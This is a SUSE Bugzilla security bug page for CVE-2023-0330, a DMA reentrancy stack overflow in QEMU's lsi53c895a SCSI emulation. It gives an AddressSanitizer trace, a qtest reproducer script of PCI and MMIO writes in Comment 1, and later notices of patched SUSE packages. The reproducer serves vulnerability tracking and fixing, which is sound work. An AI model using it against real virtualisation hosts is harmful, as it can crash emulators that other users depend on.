Bug 1207205 (CVE-2023-0330) - VUL-0: CVE-2023-0330: kvm,qemu: lsi53c895a: DMA reentrancy issue leads to stack overflow
Summary: VUL-0: CVE-2023-0330: kvm,qemu: lsi53c895a: DMA reentrancy issue leads to sta...
Status: RESOLVED FIXED
Alias: CVE-2023-0330
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: E-mail List
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/353843/
Whiteboard: CVSSv3.1:SUSE:CVE-2023-0330:5.3:(AV:L...
Keywords:
Depends on:
Blocks:
 
Reported: 2023-01-17 06:34 UTC by Alexander Bergmann
Modified: 2024-04-23 12:30 UTC (History)
5 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Alexander Bergmann 2023-01-17 06:34:41 UTC 
rh#2160151

A vulnerability in the lsi53c895a device which affects the latest version of qemu.

The carefully designed PoC can repeatedly trigger DMA writes but does
not limit the addresses written to the DMA, resulting in reentrancy
issues and eventually overflow.
It is worth noting that the DMA operation is the pci_dma_write() in
lsi_mem_write(), so the issue cannot be solved by modifying the
'attrs' flag.

The following log can reveal it:

==3850539==ERROR: AddressSanitizer: stack-overflow on address
0x7ffeb10d5e58 (pc 0x55cd154d0f16 bp 0x7ffeb10d6690 sp 0x7ffeb10d5e60
T0)
#0 0x55cd154d0f16 in __asan_memcpy
llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x55cd15b25676 in sparse_mem_read qemu/hw/mem/sparse-mem.c:50:9
#2 0x55cd16c973cd in memory_region_read_accessor
qemu/softmmu/memory.c:440:11
#3 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
#4 0x55cd16c6cf11 in memory_region_dispatch_read1 qemu/softmmu/memory.c
#5 0x55cd16c6cf11 in memory_region_dispatch_read
qemu/softmmu/memory.c:1457:9
#6 0x55cd16cb9270 in flatview_read_continue qemu/softmmu/physmem.c:2892:23
#7 0x55cd16cba14f in flatview_read qemu/softmmu/physmem.c:2934:12
#8 0x55cd16cb9ee3 in address_space_read_full qemu/softmmu/physmem.c:2947:18
#9 0x55cd15ed44c5 in dma_memory_rw_relaxed qemu/include/sysemu/dma.h:87:12
#10 0x55cd15ed44c5 in dma_memory_rw qemu/include/sysemu/dma.h:130:12
#11 0x55cd15ed44c5 in pci_dma_rw qemu/include/hw/pci/pci.h:850:12
#12 0x55cd15ed44c5 in pci_dma_read qemu/include/hw/pci/pci.h:869:12
#13 0x55cd15ed44c5 in read_dword qemu/hw/scsi/lsi53c895a.c:472:5
#14 0x55cd15ed44c5 in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1154:12
#15 0x55cd15eed0e5 in lsi_command_complete qemu/hw/scsi/lsi53c895a.c:810:5
#16 0x55cd15e3d5c1 in scsi_req_complete qemu/hw/scsi/scsi-bus.c:1518:5
#17 0x55cd15e41f9c in scsi_unit_attention qemu/hw/scsi/scsi-bus.c:422:5
#18 0x55cd15e33c59 in scsi_req_enqueue qemu/hw/scsi/scsi-bus.c:890:10
#19 0x55cd15ed869c in lsi_do_command qemu/hw/scsi/lsi53c895a.c:869:9
#20 0x55cd15ed869c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1261:13
#21 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c
#22 0x55cd16c6ef86 in memory_region_write_accessor
qemu/softmmu/memory.c:492:5
#23 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
#24 0x55cd16c6e2fa in memory_region_dispatch_write qemu/softmmu/memory.c
#25 0x55cd16cc274c in flatview_write_continue qemu/softmmu/physmem.c:2825:23
#26 0x55cd16cba662 in flatview_write qemu/softmmu/physmem.c:2867:12
#27 0x55cd16cba3f3 in address_space_write qemu/softmmu/physmem.c:2963:18
#28 0x55cd15ed4d5c in lsi_memcpy qemu/hw/scsi/lsi53c895a.c:1104:9
#29 0x55cd15ed4d5c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1563:13
#30 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c

References:
https://bugzilla.redhat.com/show_bug.cgi?id=2160151
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-0330
Comment 1 Alexander Bergmann 2023-01-17 06:52:49 UTC 
Upstream commit:
https://lists.nongnu.org/archive/html/qemu-devel/2023-01/msg03411.html

Reproducer:

cat << EOF | ./x86_64-softmmu/qemu-system-x86_64 -machine accel=qtest \
-m 512M -machine q35 -nodefaults -device lsi53c810 -device scsi-cd,drive=null0 \
-display none -blockdev driver=null-co,node-name=null0 -qtest stdio
outl 0xcf8 0x80000804   /* PCI Command Register */
outl 0xcfc 0x7                 /* Enable accesses */
outl 0xcf8 0x80000814   /* Memory Bar 1 */
outl 0xcfc 0xff100000     /* Set MMIO Address*/
outl 0xcf8 0x80000818   /* Memory Bar 2 */
outl 0xcfc 0xff000000     /* Set RAM Address*/
writel 0xff000000 0xc0000024
writel 0xff000114 0x00000080
writel 0xff00012c 0xff000000
writel 0xff000004 0xff000114
writel 0xff000008 0xff100014
writel 0xff10002f 0x000000ff
EOF
Comment 2 Dario Faggioli 2023-02-10 11:52:40 UTC 
(In reply to Alexander Bergmann from comment #1)
> Upstream commit:
> https://lists.nongnu.org/archive/html/qemu-devel/2023-01/msg03411.html
> 
I don't think this has been committed yet. Let's monitor when/if it will...
Comment 5 Dario Faggioli 2023-06-28 17:11:09 UTC 
Ok, it looks that this may have been committed, becoming:

b987718bbb1d0eabf95499b976212dd5f0120d75
Comment 11 Maintenance Automation 2023-07-28 20:30:23 UTC 
SUSE-SU-2023:3015-1: An update that solves three vulnerabilities can now be installed.

Category: security (important)
Bug References: 1198037, 1207205, 1212968
CVE References: CVE-2021-4207, CVE-2023-0330, CVE-2023-2861
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): qemu-3.1.1.1-69.1
SUSE Linux Enterprise Server 12 SP5 (src): qemu-3.1.1.1-69.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): qemu-3.1.1.1-69.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 12 Maintenance Automation 2023-08-01 08:45:05 UTC 
SUSE-SU-2023:3082-1: An update that solves four vulnerabilities and has two fixes can now be installed.

Category: security (important)
Bug References: 1179993, 1181740, 1207205, 1212968, 1213001, 1213414
CVE References: CVE-2023-0330, CVE-2023-2861, CVE-2023-3255, CVE-2023-3301
Sources used:
Server Applications Module 15-SP5 (src): qemu-7.1.0-150500.49.6.1
openSUSE Leap 15.5 (src): qemu-linux-user-7.1.0-150500.49.6.1, qemu-7.1.0-150500.49.6.1
Basesystem Module 15-SP5 (src): qemu-7.1.0-150500.49.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 OBSbugzilla Bot 2023-08-09 06:55:02 UTC 
This is an autogenerated message for OBS integration:
This bug (1207205) was mentioned in
https://build.opensuse.org/request/show/1103082 Factory / qemu
Comment 18 Maintenance Automation 2023-08-28 12:30:37 UTC 
SUSE-SU-2023:3444-1: An update that solves six vulnerabilities can now be installed.

Category: security (important)
Bug References: 1188609, 1190011, 1207205, 1212850, 1213414, 1213925
CVE References: CVE-2021-3638, CVE-2021-3750, CVE-2023-0330, CVE-2023-3180, CVE-2023-3301, CVE-2023-3354
Sources used:
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): qemu-5.2.0-150300.127.3
SUSE Manager Proxy 4.2 (src): qemu-5.2.0-150300.127.3
SUSE Manager Retail Branch Server 4.2 (src): qemu-5.2.0-150300.127.3
SUSE Manager Server 4.2 (src): qemu-5.2.0-150300.127.3
SUSE Enterprise Storage 7.1 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Micro 5.1 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Micro 5.2 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Micro for Rancher 5.2 (src): qemu-5.2.0-150300.127.3

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 19 OBSbugzilla Bot 2023-09-12 14:05:07 UTC 
This is an autogenerated message for OBS integration:
This bug (1207205) was mentioned in
https://build.opensuse.org/request/show/1110620 Factory / qemu
Comment 23 Maintenance Automation 2023-09-21 08:30:02 UTC 
SUSE-SU-2023:3721-1: An update that solves 10 vulnerabilities and has one security fix can now be installed.

Category: security (important)
Bug References: 1172382, 1188609, 1190011, 1193880, 1197653, 1198712, 1207205, 1212850, 1212968, 1213925, 1215311
CVE References: CVE-2020-13754, CVE-2021-3638, CVE-2021-3750, CVE-2021-3929, CVE-2022-1050, CVE-2022-26354, CVE-2023-0330, CVE-2023-2861, CVE-2023-3180, CVE-2023-3354
Sources used:
openSUSE Leap 15.4 (src): qemu-4.2.1-150200.79.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): qemu-4.2.1-150200.79.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): qemu-4.2.1-150200.79.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): qemu-4.2.1-150200.79.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 24 Maintenance Automation 2023-09-27 12:30:07 UTC 
SUSE-SU-2023:3800-1: An update that solves nine vulnerabilities and has one security fix can now be installed.

Category: security (important)
Bug References: 1172382, 1190011, 1193880, 1197653, 1198712, 1207205, 1212850, 1212968, 1213925, 1215311
CVE References: CVE-2019-13754, CVE-2021-3750, CVE-2021-3929, CVE-2022-1050, CVE-2022-26354, CVE-2023-0330, CVE-2023-2861, CVE-2023-3180, CVE-2023-3354
Sources used:
SUSE CaaS Platform 4.0 (src): qemu-3.1.1.1-150100.80.51.5
SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): qemu-3.1.1.1-150100.80.51.5
SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): qemu-3.1.1.1-150100.80.51.5
SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): qemu-3.1.1.1-150100.80.51.5

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 26 Maintenance Automation 2023-10-12 12:46:45 UTC 
SUSE-SU-2023:4056-1: An update that solves five vulnerabilities and has four security fixes can now be installed.

Category: security (important)
Bug References: 1179993, 1181740, 1188609, 1190011, 1207205, 1212850, 1213663, 1213925, 1215311
CVE References: CVE-2021-3638, CVE-2021-3750, CVE-2023-0330, CVE-2023-3180, CVE-2023-3354
Sources used:
openSUSE Leap 15.4 (src): qemu-linux-user-6.2.0-150400.37.23.1, qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src): qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro 5.3 (src): qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro for Rancher 5.4 (src): qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro 5.4 (src): qemu-6.2.0-150400.37.23.1
Basesystem Module 15-SP4 (src): qemu-6.2.0-150400.37.23.1
Server Applications Module 15-SP4 (src): qemu-6.2.0-150400.37.23.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 28 Maintenance Automation 2023-11-15 16:30:01 UTC 
SUSE-SU-2023:3082-2: An update that solves four vulnerabilities and has two security fixes can now be installed.

Category: security (important)
Bug References: 1179993, 1181740, 1207205, 1212968, 1213001, 1213414
CVE References: CVE-2023-0330, CVE-2023-2861, CVE-2023-3255, CVE-2023-3301
Sources used:
SUSE Linux Enterprise Micro 5.5 (src): qemu-7.1.0-150500.49.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 29 Maintenance Automation 2024-04-23 12:30:13 UTC 
SUSE-SU-2024:1395-1: An update that solves five vulnerabilities can now be installed.

Category: security (important)
Bug References: 1190011, 1198038, 1207205, 1212850, 1213925
CVE References: CVE-2021-3750, CVE-2022-0216, CVE-2023-0330, CVE-2023-3180, CVE-2023-3354
Maintenance Incident: [SUSE:Maintenance:33441](https://smelt.suse.de/incident/33441/)
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 qemu-3.1.1.1-72.1
SUSE Linux Enterprise Server 12 SP5 (src):
 qemu-3.1.1.1-72.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 qemu-3.1.1.1-72.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.